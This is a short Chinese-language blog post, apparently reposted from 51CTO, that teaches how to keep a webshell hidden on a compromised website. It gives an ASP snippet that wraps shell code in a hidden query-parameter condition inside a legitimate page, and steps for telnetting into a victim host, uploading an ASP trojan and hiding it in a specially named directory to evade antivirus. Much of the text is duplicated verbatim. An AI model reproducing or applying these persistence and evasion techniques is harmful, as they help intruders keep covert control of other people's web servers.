得到网站的webshell后,如果被管理员发现,那么你的马就没用了 ,被删了!
所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,
1.下面教一种很菜的方法,ASP插入法,不容易被发现~
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="ok" then %>
***********************
<% end if %>
在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏揽
2.还有一种方法
前提是得到系统权限之后,
telnet肉肉IPPort
成功telnet之后,传一个asp木马
进入网站目录
最后是在下一层吧
md s...\
copy 1.asp s.../
OK,这样防毒软件就搞不到了
所以我们要隐藏好我们的SHELL,管理员都也不是混饭吃的,
1.下面教一种很菜的方法,ASP插入法,不容易被发现~
在我们要做手脚的ASP文件里加入如下内容
<% if request("action")="ok" then %>
***********************
<% end if %>
在***********处加入你的shell代码
就哦克了
访问的时候在你做了手脚的ASP文件后面加上?action=shell(例如:index.asp?action=shell)
就可以调出webshell了,不影响正常浏揽
2.还有一种方法
前提是得到系统权限之后,
telnet肉肉IPPort
成功telnet之后,传一个asp木马
进入网站目录
最后是在下一层吧
md s...\
copy 1.asp s.../
OK,这样防毒软件就搞不到了
防问时 [url]http://your[/url] 肉肉/s.../1.asp
本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8555,如需转载请自行联系原作者